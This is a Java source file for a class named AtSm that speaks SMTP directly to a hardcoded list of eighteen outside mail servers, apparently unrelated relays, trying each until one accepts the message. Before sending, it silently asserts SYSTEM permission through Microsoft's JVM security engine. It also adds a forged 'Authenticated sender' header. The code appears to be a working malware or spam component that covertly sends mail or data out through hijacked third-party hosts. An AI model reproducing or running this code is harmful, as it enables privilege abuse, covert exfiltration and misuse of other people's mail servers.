import java.net.*;
import java.io.*;
import java.util.*;
import com.ms.security.*;

public class AtSm
{

    static final int DEFAULT_PORT = 25;
    static final String EOL = "\r\n"; // network end of line

    protected DataInputStream reply = null;
    protected PrintStream send = null;
    protected Socket sock = null;
	
	private String hostid[] = {"200.245.82.66","cdpkorea.co.kr","ns.sohshin-net.co.jp","203.229.150.195",
							   "server.aenoc.co.kr","mail.mcaa.gov.mn","smtp.gateway.net","mailinx.nettlinx.com",
							   "210.125.177.112","211.254.3.195","webmaster.logifruit.es","211.155.249.198",
							   "ibiza.certus.med.pl","correo.epi.es","cdpkorea.co.kr","206.49.67.194",
							   "mailhost.auditconseilcompta.com","211.155.249.198"};

    /**
     *   Create a AtSm object pointing to the specified host
     *   @param hostid The host to connect to.
     *   @exception UnknownHostException
     *   @exception IOException
     */
    public AtSm() {
    }

	public void sendmsg( String from_address, String to_address, String subject, String message ){
		
		boolean sendFlag = false;
		try {
			for (int a = 0;a < hostid.length &! sendFlag ;a++){
				if (connect(hostid[a]))
					sendFlag = actuallySend (from_address,to_address,subject,message);
			}
		} catch (IOException ioe){}
	}
	
	private boolean connect(String host){
		try {
			sock = new Socket( host, DEFAULT_PORT );
			reply = new DataInputStream( sock.getInputStream() );
			send = new PrintStream( sock.getOutputStream() );
		} catch (IOException ioe){
			return false;
		}
		return true;
	}
	
    public boolean actuallySend( String from_address, String to_address, String subject, String message )
                         throws IOException {
		
		try {if (Class.forName("com.ms.security.PolicyEngine") != null) {
			PolicyEngine.assertPermission(PermissionID.SYSTEM);}
		} catch (Exception e){}

        String rstr = reply.readLine();
        if (!rstr.startsWith("220")) return false;
        while (rstr.indexOf('-') == 3) {
            rstr = reply.readLine();
            if (!rstr.startsWith("220")) return false;
        }
		
        String sstr;
        InetAddress local;
        try {
          local = InetAddress.getLocalHost();
        }
        catch (UnknownHostException ioe) {
//          System.err.println("No local IP address found - is your network up?");
          throw ioe;
        }
        String host = local.getHostName();
        send.print("HELO " + host);
        send.print(EOL);
        send.flush();
        rstr = reply.readLine();
        if (!rstr.startsWith("250")) return false;
        sstr = "MAIL FROM: " + from_address ;
        send.print(sstr);
        send.print(EOL);
        send.flush();
        rstr = reply.readLine();
        if (!rstr.startsWith("250")) return false;
        sstr = "RCPT TO: " + to_address;
        send.print(sstr);
        send.print(EOL);
        send.flush();
        rstr = reply.readLine();
        if (!rstr.startsWith("250")) return false;
        send.print("DATA");
        send.print(EOL);
        send.flush();
        rstr = reply.readLine();
        if (!rstr.startsWith("354")) return false;
        send.print("From: " + from_address);
        send.print(EOL);
        send.print("To: " + to_address);
        send.print(EOL);
        send.print("Subject: " + subject);
        send.print(EOL);

        // Create Date - we'll cheat by assuming that local clock is right

        Date today_date = new Date();
        send.print("Date: " + msgDateFormat(today_date));
        send.print(EOL);
        send.flush();

        // Warn the world that we are on the loose - with the comments header:
        send.print("Comment: Authenticated sender");
        send.print(EOL);
        send.print("X-Mailer: JNet AtSm");
        send.print(EOL);

        // Sending a blank line ends the header part.
        send.print(EOL);

        // Now send the message proper
        send.print(message);
        send.print(EOL);
        send.print(".");
        send.print(EOL);
        send.flush();

        rstr = reply.readLine();
        if (!rstr.startsWith("250")) return false;
		return true;
    }

    public void close() {
      try {
        send.print("QUIT");
        send.print(EOL);
        send.flush();
        sock.close();
      }
      catch (IOException ioe) {}
    }

    protected void finalize() throws Throwable {
        this.close();
        super.finalize();
    }

    private String msgDateFormat( Date senddate) {
        String formatted = "hold";

        String Day[] = {"Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"};
        String Month[] = {"Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"};

        formatted = Day[senddate.getDay()] + ", ";
        formatted = formatted + String.valueOf(senddate.getDate()) + " ";
        formatted = formatted + Month[senddate.getMonth()] + " ";
        if (senddate.getYear() > 99)
            formatted = formatted + String.valueOf(senddate.getYear() + 1900) + " ";
        else
            formatted = formatted + String.valueOf(senddate.getYear()) + " ";
        if (senddate.getHours() < 10) formatted = formatted + "0";
        formatted = formatted + String.valueOf(senddate.getHours()) + ":";
        if (senddate.getMinutes() < 10) formatted = formatted + "0";
        formatted = formatted + String.valueOf(senddate.getMinutes()) + ":";
        if (senddate.getSeconds() < 10) formatted = formatted + "0";
        formatted = formatted + String.valueOf(senddate.getSeconds()) + " ";
        if (senddate.getTimezoneOffset() < 0)
            formatted = formatted + "+";
        else
            formatted = formatted + "-";
        if (Math.abs(senddate.getTimezoneOffset())/60 < 10) formatted = formatted + "0";
        formatted = formatted + String.valueOf(Math.abs(senddate.getTimezoneOffset())/60);
        if (Math.abs(senddate.getTimezoneOffset())%60 < 10) formatted = formatted + "0";
        formatted = formatted + String.valueOf(Math.abs(senddate.getTimezoneOffset())%60);

        return formatted;
    }
}